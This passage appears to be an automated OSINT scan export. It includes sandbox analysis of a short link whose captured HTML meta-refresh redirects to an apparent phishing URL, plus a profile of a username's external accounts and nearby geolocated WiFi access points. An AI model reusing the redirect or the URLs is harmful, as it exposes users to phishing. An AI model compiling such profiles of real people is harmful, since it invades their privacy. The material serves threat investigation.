u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "down_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003292]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF82199855D99D5F85.TMP" has type "data"- Location: [%TEMP%\\~DF82199855D99D5F85.TMP]- [targetUID: 00000000-00004088]\n "~DF6973702D5F642C4C.TMP" has type "data"- Location: [%TEMP%\\~DF6973702D5F642C4C.TMP]- [targetUID: 00000000-00004088]\n "_2CF926F8-B17E-11ED-8073-0800273C3D4C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "Cab54EA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab54EA.tmp]- [targetUID: 00000000-00003292]\n "WIRQ4PF5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WIRQ4PF5.txt]- [targetUID: 00000000-00004088]\n "Tar5362.tmp" has type "data"- Location: [%TEMP%\\Tar5362.tmp]- [targetUID: 00000000-00003292]\n "info_48_1_" has type "PNG image data 47 x 48 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFC3F757ED4B5F6D8C.TMP" has type "data"- Location: [%TEMP%\\~DFC3F757ED4B5F6D8C.TMP]- [targetUID: 00000000-00004088]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "N0SMPU3L.txt" has type "ASCII text"- Location: 
[%APPDATA%\\Microsoft\\Windows\\Cookies\\N0SMPU3L.txt]- [targetUID: 00000000-00004088]\n "RecoveryStore._856A4483-B17B-11ED-8073-0800273C3D4C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar54FB.tmp" has type "data"- Location: [%TEMP%\\Tar54FB.tmp]- [targetUID: 00000000-00003292]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004088]\n "Cab5361.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab5361.tmp]- [targetUID: 00000000-00003292]\n "http_404_1_" has type "HTML document UTF-8 Unicode (with BOM) text with very long lines with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://vismliko.github.io/runssitory/index.html"\n Pattern match: "https://vismliko.github.io"\n Heuristic match: "connectenligne.derlma.com"\n Pattern match: "https://connectenligne.derlma.com/TFGHFGHFTRH/11/mail@tler/nanelms/fr/9999"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /runssitory/index.html HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 
vismliko.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nConnection: keep-alive\nContent-Length: 237\nServer: GitHub.com\nContent-Type: text/html; charset=utf-8\npermissions-policy: interest-cohort=()\nLast-Modified: Sat, 18 Feb 2023 20:40:04 GMT\nAccess-Control-Allow-Origin: *\nStrict-Transport-Security: max-age=31556952\nETag: "63f137a4-ed"\nexpires: Tue, 21 Feb 2023 01:07:42 GMT\nCache-Control: max-age=600\nx-proxy-cache: MISS\nX-GitHub-Request-Id: EADC:3606:196E1F:1DB1A0:63F41706\nAccept-Ranges: bytes\nDate: Tue, 21 Feb 2023 00:57:42 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10074-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1676941063.658138,VS0,VE95\nVary: Accept-Encoding\nX-Fastly-Request-ID: cdb302efca5f6fb6cece2995633e3658e2e79131"\n "<!DOCTYPE html>\n<html>\n <head>\n <meta charset="UTF-8" />\n <meta http-equiv="refresh" content="0; URL=https://connectenligne.derlma.com/TFGHFGHFTRH/11/mail@tler/nanelms/fr/9999" />\n </head>\n <body>\n \n </body>\n</html>"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: vismliko.github.io\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nConnection: keep-alive\nContent-Length: 5142\nServer: GitHub.com\nContent-Type: text/html; charset=utf-8\npermissions-policy: interest-cohort=()\nETag: W/"63cf03be-239b"\nContent-Security-Policy: default-src \'none\'; style-src \'unsafe-inline\'; img-src data:; connect-src \'self\'\nContent-Encoding: gzip\nX-GitHub-Request-Id: 3626:6688:196418:1DA771:63F41709\nAccept-Ranges: bytes\nDate: Tue, 21 Feb 2023 00:57:45 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10074-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1676941065.214280,VS0,VE87\nVary: Accept-Encoding\nX-Fastly-Request-ID: 8921bafc7550ba044cb481baf67d48229733be04"\n "GET /TFGHFGHFTRH/11/mail@tler/nanelms/fr/9999 HTTP/1.1\nAccept: text/html, application/xhtml+xml, 
*/*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: connectenligne.derlma.com\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.0 404 Not Found\nDate: Tue, 21 Feb 2023 00:57:47 GMT\nServer: Apache/2.4.54 (Debian)\nContent-Length: 0\nConnection: close\nContent-Type: text/html; charset=UTF-8"'}, {u'category': u'External Systems', u'origin' | 185.199.109.153 |
| 2023-05-12 02:44:24 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c59a6bfbf716314-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Netherlands | 104.21.6.166 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.217): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:33:53 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Page Not Found</title>
<style>
</style>
</head>
<body>
<h1>Page Not Found</h1>
</div>
<p>Looks like you've followed a broken link or entered a URL that doesn't exist on this site.</p>
<p>
</svg>
Back to our site
</a>
</p>
</p>
</div>
</div>
</div>
<script>
</script>
</body>
</html>
| https://funny.battleb0t.xyz/images/withat_5.jpg |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | malsup.github.io | 185.199.110.153 |
| 2023-05-12 02:58:45 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://tiny.one/vkds2czp', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fd0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fd0_IESQMMUTEX_0_303"\n "IsoScope_fd0_IE_EarlyTabStart_0xa28_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fd0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4048"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_fd0_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_fd0_ConnHashTable<4048>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.197.3.8:80"\n "104.19.137.56:443"\n "184.31.135.120:80"\n "34.74.170.74:443"\n "18.158.249.130:443"\n 
"13.227.44.127:80"\n "13.227.44.75:80"\n "18.195.27.143:443"\n "54.230.57.124:80"\n "13.227.44.102:80"\n "54.230.57.140:80"\n "54.230.57.39:80"\n "205.185.216.42:443"\n "142.251.46.202:443"\n "142.251.46.232:443"\n "142.251.46.195:80"\n "142.250.188.14:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crl.pki.goog"\n "crl.rootca1.amazontrust.com"\n "crl.rootg2.amazontrust.com"\n "crl.sca1b.amazontrust.com"\n "crls.pki.goog"\n "fickfreunde.de"\n "o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "x1.c.lencr.org"\n "x2.c.lencr.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"x1.c.lencr.org"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "crl.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "crl.sca1b.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.pki.goog"\n "crl.pki.goog"\n "crls.pki.goog"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata 
directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "XM1W3787.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XM1W3787.txt]- [targetUID: 00000000-00004048]\n Dropped file: "GTDQ1BCW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GTDQ1BCW.txt]- [targetUID: 00000000-00004048]\n Dropped file: "NV1LND8V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NV1LND8V.txt]- [targetUID: 00000000-00003196]\n Dropped file: "91FRE6MN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\91FRE6MN.txt]- [targetUID: 00000000-00003196]\n Dropped file: "4YVPDQ8O.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4YVPDQ8O.txt]- [targetUID: 00000000-00004048]\n Dropped file: "JN3YCX92.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JN3YCX92.txt]- [targetUID: 00000000-00003196]\n Dropped file: "L7OFV9WB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L7OFV9WB.txt]- [targetUID: 00000000-00003196]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "CabE94D.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "bootstrap.min.c5b5b2fa19bd66ff23211d9f844e0131_1_.js" has type "ASCII 
text with very long lines"- [targetUID: N/A]\n "Report.wer.tmp" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00004048]\n "3538626A1FCCCA43C7E18F220BDD9B02" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\3538626A1FCCCA43C7E18F220BDD9B02]- [targetUID: 00000000-00003196]\n "~DF7C3969B65B11E63B.TMP" has type "data"- Location: [%TEMP%\\~DF7C3969B65B11E63B.TMP]- [targetUID: 00000000-00004048]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003196]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003196]\n "73DA0AE306CF69ADAC457DB6B2997338" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00003196]\n "70DAE932E3BCB3C00656A27B544BA9CA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\70DAE932E3BCB3C00656A27B544BA9CA]- [targetUID: 00000000-00003196]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003196]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00004048]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- 
Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00004048]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFCAAE1DAD68AC182.TMP" has type "data"- Location: [%TEMP%\\~DFFCAAE1DAD68AC182.TMP]- [targetUID: 00000000-00004048]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003196]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00003196]\n "~DFF63874B4B14647AC.TMP" has type "data"- Location: [%TEMP%\\~DFF63874B4B14647AC.TMP]- [targetUID: 00000000-00004048]\n "F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\F07644E38ED7C9F37D11EEC6D4335E02_D4DDF242A8972F898C0FE0D6EA6919E3]- [targetUID: 00000000-00003196]\n "7D6243C18F0F8F9AEC6638DD210F1984_70FF9CF72C17814AF5276C6CA0C1775E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D6243C18F0F8F9AEC6638DD210F1984_70FF9CF72C17814AF5276C6CA0C1775E]- [targetUID: 00000000-00003196]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://tiny.one/vkds2czp"\n Pattern match: "https://tiny.one"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: 
Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontr | 34.74.170.74 |
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:80 | 172.67.135.9 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pfa (Net ID: 00:02:6F:C4:70:30) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/Altpapier/ | Altpapier |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | freesound (Category: music)
https://freesound.org/people/Altpapier/ | Altpapier |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c596497ac4b8134-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 02:54:18 | Web Content | No | Web Spider | 4 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixel's API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixel's API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixel's API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the user's profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
| nwapi.battleb0t.xyz |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 104.21.71.14 |
| 2023-05-12 03:09:55 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.104 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | aihu.xyz | ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | COLOURlovers (Category: hobby)
https://www.colourlovers.com/lover/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | villagio (Net ID: 00:01:24:F0:87:66) | 33.6170672,-111.90564645297056 |
